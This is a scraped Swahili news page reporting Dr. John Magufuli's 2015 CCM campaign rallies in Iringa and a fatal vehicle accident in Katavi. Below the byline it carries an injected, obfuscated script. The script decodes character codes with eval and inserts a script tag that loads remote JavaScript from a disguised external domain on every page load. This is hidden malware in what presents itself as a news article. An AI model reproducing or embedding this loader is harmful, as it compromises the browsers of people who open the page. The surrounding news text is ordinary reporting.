Recent Comments

Magufuli: Watanzania wamekata tamaa

By Baraka Bitariho Sep 29, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

magufuli2-300x151

*Asema haiwezekani wachache wale kuku kwa mrija

Na Bakari Kimwanga, Iringa

MGOMBEA urais kwa tiketi ya Chama Cha Mapinduzi (CCM), Dk. John Magufuli, amesema amejipanga kulipa deni kwa Watanzania kwa kuleta mabadiliko ya kweli.

Amesema pamoja na hali hiyo, anatambua namna wananchi walivyokata tamaa ikiwamo kushindwa kubadili maisha yao, kutokana na ubinafsi wa watu wachache ambao wameamua kujimilikisha rasilimali za nchi.

Dk. Magufuli, alitoa kauli hiyo kwa nyakati tofauti jana, alipohutubia mikutano ya hadhara katika majimbo ya Kalenga, Kilolo na Iringa Mjini.

Alisema nchi haiwezi kuendelea kwa mfumo wa baadhi ya watu kujiona wao wapo daraja la kwanza, huku wananchi wa kawaida wakiendelea kuishi maisha ya kawaida.

Alisema kutokana na hali hiyo, Serikali yake ya awamu ya tano itahakikisha inatoa fursa kwa Watanzania wote kunufaika na rasilimali za taifa.

Alisema Serikali yake, itakuwa ya watu waadilifu ambao watakuwa tayari kufanya kazi kwa masilahi ya watu.

“Ndugu zangu, mambo ni mengi ambayo nataka kuyafanya.. nataka kuleta maendeleo ya kweli na Tanzania mpya ambayo itawafanya wananchi wote wafurahie Serikali yao kuliko sasa.

“Ninajua kila zama na kitabu chake, Serikali ya Magufuli inakuja kufanyakazi, ikiwamo ya kuwafunga mafisadi…kwa hili simung’unyi maneno Watanzania nitalitekeleza kwa vitendo kikubwa ninawaomba mniamini kwa kunichagua.

“Ninajua Watanzania wanataka mabadiliko ambayo ni M4C yaani ‘Magufuli for Change’ na kwa lugha ya kawaida ni Magufuli kwa mabadiliko tena ya kweli,” alisema Dk. Magufuli.

Akizungumza namna atakavyoubadili mji wa Iringa, alisema anajua changamoto zilizopo katika mkoa huo, ikiwamo kero ya barabara hasa za ndani.

“Ninawashangaa watu wanasema eti CCM haijafanya kitu na wengine ni hapa hapa Iringa mjini tena mchungaji wa kondoo wa Mungu ambaye anazijua amri kumi za Mungu ikiwemo ya kutosema uongo.

“Tena amekuwa akitukana ovyo ndani na nje ya Bunge nataka kuwaambia mawaziri nao ni binadamu wana nyongo…nataka kuwauliza ikiwa kila siku unamtukana waziri hivi kweli anaweza kukupa fedha za maendeleo, nichagueni mimi na wabunge wa CCM,” alisema.

Alisema anahitaji ushindi wa asilimia 99 ili wapinzani waisome namba kupitia masanduku ya kura.

Dk. Magufuli ambaye ni maarufu kwa jina la ‘Tingatinga’ alisema anajua kazi kubwa anatakayokuwa nayo ikiwemo kulinda amani na umoja wa Watanzania.

“Ninataka kuwaambia mimi, nimekuwa waziri kwa miaka 20 sijawahi kukemewa wala kufukuzwa nawahakikishia Watanzania nitafanyakazi usiku na mchana kulinda amani ya nchi yetu,” alisema.

Alisema pamoja na yaliyotokea ya baadhi ya wana CCM kuhama, yeye yupo imara na huenda watu hao kuondoka kwao itakuwa salama kwa chama hicho ambacho tayari kilianza kuonekana hakifai mbele ya Watanzania.

Alisema Serikali yake itakuwa rafiki wa wafanyabishara na anaunga mkono kazi kubwa ya kukuza ajira inayofanywa na kada wa chama hicho Mkoa wa Iringa, Said Asas ambaye ameweza kuajiri vijana wa mkoa huo zaidi ya 400.

Abadili staili jukwaani

Katika kile kinachoonekana kubadili aina ya kuomba kura jukwaani, Dk. Magufuli kila alipokuwa anaitwa alikuwa akirukaruka jukwaani na kisha kuanza kuhutubia.

Akiwa wilayani Kilolo, baada ya kurukaruka jukwaani, alimpigisha ‘push up’ mgombea ubunge wa jimbo hilo, Venance Mwamoto huku akisema kufanya hivyo ni ishara ya wagombea wa CCM wako imara.

“CCM ipo imara pamoja na wagombea wake wote kuanzia urais, ubunge na udiwani, ndiyo maana tunaanza hivi ili Watanzania waone tuna kiu ya kweli ya kuwaletea maendeleo,” alisema.

Nape: CCM si malaika

Kwa upande wake, Katibu wa NEC, Itikadi na Uenezi, Nape Nnauye, alisema CCM inaongozwa na watu na si malaika ambao wapo sahihi kila wakati na kwa kila kitu.

“Tunajua Watanzania wanahitaji mabadiliko, tunaamini hakuna wa kuyaleta zaidi ya Dk. Magufuli ambaye ataongoza Serikali na chama chetu ili kiwe imara zaidi,” alisema.

Kwa upande wake, Mjumbe wa Kamati ya Kampeni ya CCM, William Lukuvi, aliwataka Watanzania kutochagua rais wa mbwembwe, ispokuwa wachague rais kwa sifa zake hasa Dk. Magufuli.

Mwisho

Ajali yaua watano

Na Walter Mguluchuma, Katavi

WATU watano wamefariki dunia papo hapo na wengine kadhaa kujeruhiwa wilayani Mlele Mkoa wa Katavi, baada ya gari walilokuwa wakisafiria kupinduka.

Akizungumza na waandishi wa habari jana, Kamanda wa Polisi Mkoa wa Katavi, Dhahiri Kidavashari alisema ajali hiyo ilitokea jana saa 9 alasiri katika Kijiji cha Matandalani.

Alisema ajali hiyo, ililihususha gari aina ya Noah lenye namba za usajili T451 DDP lililokuwa likiendeshwa na Justine Ndayele (24) mkazi wa Mkoa wa Kigoma.

Alisema gari hilo mali ya Adamu Omary, lilikuwa likitokea Mpanda mjini kwenda Kijiji cha Sitalike.

Aliwataja waliofariki dunia kuwa ni Lunyalaja Nzugamrwa (50), Furaha Edward (35), Eva Mwanisawa (25), Maiko Jacob wote wakazi wa Kijiji cha Sitalike na Mwila Kifwewe (25) mkazi wa mtaa wa Kawajense mjini Mpanda.

Alisema miili ya marehemu hao, imehifadhiwa katika Hospitali ya Wilaya ya Mpanda.

Kamanda Kidavashari, aliwataja majeruhi kuwa ni Felista Matunda (30) mkazi wa tarafa ya Inyonga,Thobias Kisila (65) mkazi wa Kijiji cha Sitalike, Velina Libaratu (9) mkazi wa Mpimbwe,Odila Lenatusi (19), Ndila Kameme (32) wote wakazi wa mtaa wa Nsemlwa.

Alisema majeruhi hao, wamelazwa Hospitali ya Wilaya ya Mpanda wakiendelea na matibabu.

Alisema jeshi hilo, linamshikilia dereva wa gari hilo na kwamba upelelezi wa tukio hilo utakapokamilika dereva huyo atafikishwa mahakamani.

OP Mtanzania

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com